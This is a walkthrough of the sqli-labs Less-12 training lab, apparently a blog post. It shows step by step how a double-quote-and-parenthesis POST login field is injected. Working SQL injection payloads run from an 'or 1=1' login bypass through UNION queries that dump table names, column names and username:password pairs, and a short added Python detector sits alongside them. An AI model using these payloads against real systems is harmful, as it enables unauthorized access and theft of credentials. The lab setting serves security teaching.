sqli-labs Less-12

Less-12 POST - Error Based - Double quotes - String - with twist

Less-12 differs from Less-11 only in the quoting: one uses single quotes, the other uses double quotes wrapped in parentheses. For Less-12 we go straight to the exercise in Burp Suite; the steps are the same as for Less-11.

0x01. Original page

The username and password parameters are uname and passwd. In Burp, the submitted parameters are uname=xxx&passwd=xxx

0x02. Analyzing injection type

uname=1&passwd=1&submit=Submit

uname=1'&passwd=1&submit=Submit

uname=1"&passwd=1&submit=Submit

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1") LIMIT 0,1' at line 1

The error message shows that this is a character (string) injection in which the parameter is wrapped in double quotes inside parentheses.
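Why the double-quote probe above breaks the query while a single quote does not, as an added example that is not part of the original post: a small Python check that flags login fields whose value would close a `("...")` string literal. The query shape is an assumption inferred from the error text, and `leaves_string_context`, `flag_body` and the sample bodies are constructed here.

```python
from urllib.parse import parse_qs

# Assumption, inferred from the error text near '1") LIMIT 0,1': each field is
# pasted unescaped into a ("<value>") slot of the login query.
FIELDS = ("uname", "passwd")

def leaves_string_context(value: str) -> bool:
    """True if value terminates the surrounding double-quoted MySQL literal."""
    i = 0
    while i < len(value):
        ch = value[i]
        if ch == "\\":                      # backslash escapes the next character
            if i + 1 == len(value):
                return True                 # ...which would be the slot's closing quote
            i += 2
        elif ch == '"':
            if value[i + 1:i + 2] == '"':   # "" is a literal quote, still inside
                i += 2
            else:
                return True                 # lone " closes the literal early
        else:
            i += 1                          # includes ', which is inert here
    return False

def flag_body(body: str) -> list[str]:
    """Names of login fields in a form-encoded POST body that break out."""
    params = parse_qs(body, keep_blank_values=True)
    return [f for f in FIELDS
            if any(leaves_string_context(v) for v in params.get(f, []))]

# Constructed sample bodies, modelled on the three probes in section 0x02.
SAMPLES = [
    "uname=1&passwd=1&submit=Submit",
    "uname=1'&passwd=1&submit=Submit",
    'uname=1"&passwd=1&submit=Submit',
    'uname=say ""hi""&passwd=1&submit=Submit',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(flag_body(body) or "ok", "<-", body)
```

A check like this only explains and flags the symptom; the fix on the server side is to bind uname and passwd as parameters of a prepared statement instead of pasting them into the query text.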

0x03. Analyzing the injection point

Universal password attempt:

uname=1") or 1=1#&passwd=1&submit=Submit

0x04. Determining the number of fields

uname=admin") order by 3#&passwd=1&submit=Submit

uname=admin") order by 2#&passwd=1&submit=Submit

The query returns 2 fields. This is the number of fields returned by the query, not the number of fields in the table.

0x05. Get user and database name

uname=1") union select user(),database()--+&passwd=1&submit=Submit

0x06. Get all the table names in the security database

uname=1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=1&submit=Submit

0x07. Get all the field names of the users table

uname=1") union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#&passwd=1&submit=Submit

0x08. Get all field values

uname=1") union select 1,group_concat(username,0x3a,password) from users#&passwd=1&submit=Submit

Origin blog.csdn.net/qq_42630215/article/details/105116509